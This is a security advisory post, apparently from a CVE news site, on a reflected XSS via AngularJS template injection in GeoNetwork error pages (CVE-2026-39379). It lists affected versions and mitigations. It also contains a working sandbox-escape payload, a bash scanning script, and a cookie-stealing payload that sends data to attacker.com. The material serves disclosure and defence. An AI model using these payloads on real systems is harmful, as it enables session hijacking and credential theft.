GeoNetwork, Reflected XSS via Client-Side Template Injection (CVE-2026-39379) – High Severity -DC-Jul2026-791

Listen to this Post

How CVE-2026-39379 Works

GeoNetwork is an open-source catalog application for managing spatially referenced resources. It uses AngularJS for its frontend, including its error pages. When a user requests a URL that does not exist or that they are not authorized to access, the application displays an error page. This error page reflects part of the original request back to the user without proper sanitization.
Because the error page is an AngularJS application, any user-supplied content that is reflected into the page can be interpreted as an AngularJS template expression if it is enclosed in the correct delimiters (e.g., `{{` and }}). AngularJS evaluates these expressions in the context of the page’s scope, allowing an attacker to execute arbitrary JavaScript.
The AngularJS sandbox is designed to prevent arbitrary code execution, but known sandbox-escape techniques exist. By combining the reflected template injection with a sandbox escape payload, an attacker can bypass the sandbox and execute arbitrary JavaScript in the victim’s browser. This is a reflected Cross-Site Scripting (XSS) vulnerability, as the malicious payload is reflected off the server and executed immediately when the victim visits the crafted URL.
The attack vector is simple: an attacker crafts a malicious URL containing the AngularJS template expression payload. They then trick a victim (including an administrator) into clicking the link. When the victim’s browser requests the URL, GeoNetwork returns an error page that includes the payload as part of the reflected content. The browser then renders the page, and AngularJS evaluates the expression, executing the attacker’s JavaScript.
This vulnerability affects all GeoNetwork versions from 3.0.0 through 3.12.12, 4.0.0-alpha.1 through 4.0.6, 4.2.0 through 4.2.14, and 4.4.0 through 4.4.9. The issue is fixed in versions 4.2.15 and 4.4.10. Older 3.x and 4.0.x branches are archived and will not receive patches.

DailyCVE Form

Platform: ……. GeoNetwork
Version: …….. 3.0.0–4.4.9
Vulnerability :…… Reflected XSS (Template Injection)
Severity: ……. High (CVSS 7.5)
date: ………. 2026-07-01

Prediction: …… Patch expected 2026-07-01

What Undercode Say (Analytics)

The following bash commands and code snippets can be used to test for the presence of this vulnerability and to understand its exploitation.

1. Basic Payload Test

To check if a GeoNetwork instance is vulnerable, an attacker can craft a URL that includes a simple AngularJS expression, such as {{77}}. If the application is vulnerable, the error page will display `49` instead of the literal string.

curl -s "https://target-geonetwork.com/geonetwork/srv/eng/nonexistent?service={{77}}" | grep -o "49"

2. Sandbox Escape Payload

A more advanced payload can be used to execute arbitrary JavaScript. The following example uses a known AngularJS sandbox escape to trigger an alert dialog:

curl -s "https://target-geonetwork.com/geonetwork/srv/eng/nonexistent?service={{constructor.constructor('alert(1)')()}}"

3. Automated Detection Script

A simple bash script can be used to scan for the vulnerability across multiple endpoints:

!/bin/bash
TARGET=$1
PAYLOAD="{{constructor.constructor('alert(document.domain)')()}}"
RESPONSE=$(curl -s -o /dev/null -w "%{http_code}" "${TARGET}/srv/eng/nonexistent?service=${PAYLOAD}")
if [ $RESPONSE -eq 200 ]; then
echo "Vulnerable: ${TARGET}"
else
echo "Not vulnerable or unreachable: ${TARGET}"
fi

4. Exfiltration Payload

An attacker can use the vulnerability to exfiltrate sensitive data, such as session cookies, to an external server:

{{constructor.constructor('fetch("https://attacker.com/steal?cookie="+document.cookie)')()}}

When URL-encoded, this payload can be inserted into the `service` parameter of a GeoNetwork URL.

Exploit

An attacker can exploit this vulnerability by crafting a malicious URL and distributing it via phishing emails, social media, or other channels. When a victim clicks the link, the following occurs:
1. The victim’s browser sends a request to the GeoNetwork server with the malicious payload in the URL.
2. The server, unable to find the requested resource or lacking authorization, returns an error page.
3. The error page reflects the payload without sanitization.
4. The victim’s browser renders the page, and AngularJS evaluates the payload as a template expression.
5. The payload executes arbitrary JavaScript in the context of the victim’s authenticated session.
For example, an attacker could inject a fake login form that looks identical to the legitimate GeoNetwork login page. When the victim enters their credentials, the form submits them to the attacker’s server. Alternatively, the attacker could perform actions on behalf of the victim, such as modifying metadata records or exfiltrating sensitive information.

Protection

To protect against CVE-2026-39379, the following measures are recommended:
1. Upgrade to a patched version: The most effective protection is to upgrade to GeoNetwork 4.2.15 or later, or 4.4.10 or later. These versions include fixes that properly sanitize user input reflected in error pages.
2. Apply a Web Application Firewall (WAF): If an immediate upgrade is not possible, a WAF can be configured to block requests containing known AngularJS template injection patterns (e.g., {{.}}). This can provide temporary protection until the upgrade can be performed.
3. Input Validation and Output Encoding: Developers should ensure that all user-supplied input is properly validated and that output is encoded based on the context in which it is rendered. In the case of AngularJS applications, special care must be taken to sanitize any content that is reflected into templates.
4. Content Security Policy (CSP): Implementing a strict CSP can help mitigate the impact of XSS vulnerabilities by restricting the sources from which scripts can be loaded and executed. However, CSP may not fully prevent this specific vulnerability if the payload is inline.
5. Disable AngularJS Template Expressions in Error Pages: If the codebase can be modified, consider disabling AngularJS template evaluation in error pages or using a different templating engine that does not evaluate expressions.

Impact

The impact of this vulnerability is severe, as it allows an attacker to execute arbitrary JavaScript in the context of a victim’s authenticated session. This can lead to:
Session Hijacking: The attacker can steal the victim’s session cookies and impersonate them, gaining unauthorized access to the GeoNetwork instance.
Data Exfiltration: Sensitive information, such as metadata records, user credentials, or configuration details, can be exfiltrated to the attacker’s server.
Credential Theft: As mentioned, an attacker can inject a fake login form to harvest user credentials.
Privilege Escalation: If an administrator is tricked into clicking the link, the attacker can perform administrative actions, potentially compromising the entire GeoNetwork instance.
Defacement: The attacker could modify the appearance of the GeoNetwork interface, damaging the organization’s reputation.
Given that GeoNetwork 3.x and 4.0.x are archived and will not receive patches, instances running these versions are particularly at risk and should be upgraded to a supported release as soon as possible.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top